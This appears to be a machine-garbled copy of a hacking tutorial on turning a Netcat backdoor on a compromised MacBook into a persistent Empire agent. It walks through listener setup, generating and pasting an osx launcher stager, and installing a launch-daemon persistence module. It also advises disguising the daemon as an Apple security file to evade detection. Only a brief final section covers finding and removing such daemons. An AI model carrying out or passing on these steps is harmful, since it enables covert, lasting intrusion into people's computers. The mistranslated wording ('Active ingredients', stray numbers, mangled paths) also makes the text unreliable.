After backdoor access to a MacBook that is not protected by FileVault or uses a fake PDF document to gain remote access, an attacker might want to upgrade their Netcat shell to a more complete version. While a root shell allows attackers to remotely modify most files on the MacBook, Empire has some useful post-exploit modules that make hacking Macs very easy.
At this time, an attacker would have already received remote access to the target MacBook another Mac model computer. In my example, I'm building on an already established Netcat backdoor
`/ tokyoneon ~ nc -l -p 1234 to listen [any] 1234 ... xx.xx.x.xx xxxxxxxxx xxxx xxxxxx xxxxx: xxxxxxxx xxxxxx connect with [xx.xx.x.xx) from (xxxxx) [xx.xx.x.xx] 50027 bash: no job control in this shell bash-3.2 # _
To begin, Empire should be installed and configured on the attacker's system. If the destination MacBook is on a local network, installing Empire in Kali will do the trick. If the target is mobile and constantly moving between Wi-Fi networks, Empire must be installed on the attacker's virtual private server (VPS).
Do Not Miss: How to Connect to MacBook Backdoors  Step 1: Start the Empire Listener
Empire should be running with a listener listening for incoming connections from the destination MacBook waiting. In this example, I'm using an HTTP listener on port 8080. The following commands can be used to quickly set up an Empire listener.
uselistener http Set port 8080 Host
This is what it should look like after you have executed the commands:
(Empire)> listeners [!] Currently no listeners are active (Empire: listener)> uselistener http (Empire: Listeners / http)> set port 8080 (Empire: Listener / http)> set host xx.xx.x.xx (Empire: Listener / http)> execute [*] Starting Listener "http" * Serving Flask App "http" (lazy loading) * Environment: Production WARNING: Do not use the development server in a production environment. Use a WSGI production server instead. * Debug mode: off [+] Handset started successfully! (Empire: Listener / http)> Listener [*] Active listeners: Host delay / jitter of the name module ---- ------ ---- ----------- http http: //xx.xx.x.xx: 8080 5 / 0,0 (Empire: listeners)> _
Step 2: Generate the Stager
Next, create a launcher script with the osx / launcher holder. This can be done with the following commands:
usestager osx / launcher Set Listener http generate
The entire empire output should be copied and pasted into the Netcat terminal. In the example above, this would be the long line starting with "echo" at the bottom.
A New Agent Will Appear in the Empire Terminal Attackers Will Explode the MacBook
(Empire: agents)> [*] PYTHON-Stage Stage 1) to xx.xx.x.xx [*] Agent P98MAEE0 from xx.xx.x.xx has posted a valid Python PUB key [*] The new agent P98MAEE0 has checked in [+] Initial Agent P98MAEE0 of xx.xx.x.xx now active (Slack) [*] Send agent (level 2) to P98MAEE0 at xx.xx.x.xx [>] ................... (Empire: Agents)> _
The attacker has a large number of post-exploitation modules available at this time. Stay tuned for future articles where I'll show you how to use Empire's most advanced analysis modules to further compromise the MacBook and its Wi-Fi networks.
Copying Empire Edition is easy enough for a hacker. You want to upgrade your shell to a more advanced framework such as Empire or Metasploit. But maintaining such a back door for a long time is a little trickier. The Python script, which is currently running as a background process, shuts down when the user logs off or the computer is turned off.
The following is a persistence engine that creates a new Empire Agent every time I restart the MacBook. 19659023] Step 3: Set Persistence with Empire
In the Empire terminal, use the command agents to display the newly created agent. Then use the command interact to start the compromised MacBook
(Empire)> agents [*] Active ingredients: Name Long Internal IP machine name Username Process ---- ---- ----------- ------------ -------- ------- P98MAEEO xx.xx.x.xx xxxxx MacBook A * root / usr / bin / py (Empire: Agents)> interact with P98MAEEO (Empire: P98MAEEO)> _
The command info can be used to display the available module options
(Empire)> interact with P98MAEEO (Empire: P98MAEEO)> usemodule persistence / osx / launchdaemonexecutable (Empire: Python / persistence / osx / launchdaemonexecutable)> About options: Name Required value Description ---- -------- ----- ----------- SafeChecks True True Switch. If you are looking for LittleSnitch or a SandBox, stop the staging process if the value is true. The default value is True. DaemonLocation True The full path where the Empire Lau daemon is located. DaemonName True com.proxy.initialize Name of the launch daemon to install. Name is also used for the PLIST file. Agent True P98MAEE0 Agent on which to run the module. Listener True Listener to use. UserAgent False default User-agent string used for the deer, request (default, none or other). (Empire: python / persistence / osx / launchdaemonexecutable)>
This particular Empire module requires several options to be set before running on the target MacBook. The required options can be set with the following commands:
set DaemonLocation / etc / empire_persistence Set daemonName com.empire set agent
This would look like this, in my example:
(Empire: python / persistence / osx / launchdaemonexecutable)> set daemonLocation / etc / empire_persistence (Empire: python / persistence / osx / launchdaemonexecutable)> set daemonname com.empire (Empire: python / persistence / osx / launchdaemonexecutable)> set agent P98MAEE0 (Empire: python / persistence / osx / launchdaemonexecutable)> set Listener http (Empire: python / persistence / osx / launchdaemonexecutable)> _
- DaemonLocation is the full path to the executable empire file that executes when the MacBook restarts. For demonstration purposes I will use the directory / etc / and the file name empire_persistence. To avoid detection, the daemon can be created in a less obvious location.
- The DaemonName (com.empire) is the name of the .plist configuration file and can be renamed to anything. For a more convincing file name, attackers can use com.applesecurity.plist. This .plist file is automatically stored in the / Library / LaunchDaemons / directory on the destination MacBook and should not be moved or modified. Startup daemons must be in this directory.
- The agent and listener should also be set accordingly if it is not set automatically.
Use the execute command to embed the Empire backdoor into the MacBook. 19659003] execute
Below is what my example looks like. You may need to select Y on your keyboard if you are advised that the option is not opsec-safe.
(Empire: python / persistence / osx / launchdaemonexecutable)> Run [>] module is not opsec safe, run? [y/N] y [*] P98MAEEO was instructed to execute TASK CMD WAIT [*] Agent P98MAEEO has been tasked with task ID 1 [*] The P98MAEEO agent ran the python / persistence / osx / launchdaemonexecutable module (Empire: Python / persistence / osx / launchdaemonexecutable)> [*] Agent P98MAEEO returned [+] Persistence has been installed: /Library/LaunchDaemons/com.empire.plist [+] The empire daemon was written in / etc / empire_persistence [*] Valid results from xx.xx.x.xx (Empire: python / persistence / osx / launchdaemonexecutable)> _
How to Protect Against Persistent Backdoors
While some antivirus software protects against such attacks, there is no way to be sure without some testing on a Mac perform. I will write what I will do later for an anti-virus bypass article. I will update my results here if they actually protect against lingering backdoors. Otherwise …
- Search for suspicious files. Boot daemons and directories used by macOS include / Library / LaunchDaemons, / Library / LaunchAgents, and / Users /
/ Library / LaunchAgents. Files in these directories can be checked by opening Terminal with the commands cd and ls to change to the desired directory and display its contents. With the command launchctl suspicious demons can be deactivated and removed with the command rm .
tokyoneon: ~ root # cd / Library / LaunchDaemons / tokyoneon: / Library / LaunchDaemons root # ls com.apple.plist com.h4ck3r.plist com.empire.plist com.netcat.plist tokyoneon: / Library / LaunchDaemons root # sudo launchctl unloads com.h4ck3r.plist tokyoneon: / Library / LaunchDaemons root # rm com.h4ck3r.plist tokyoneon: / Library / LaunchDaemons root #
Do not miss: Null Bytes Guides on Hacking macOS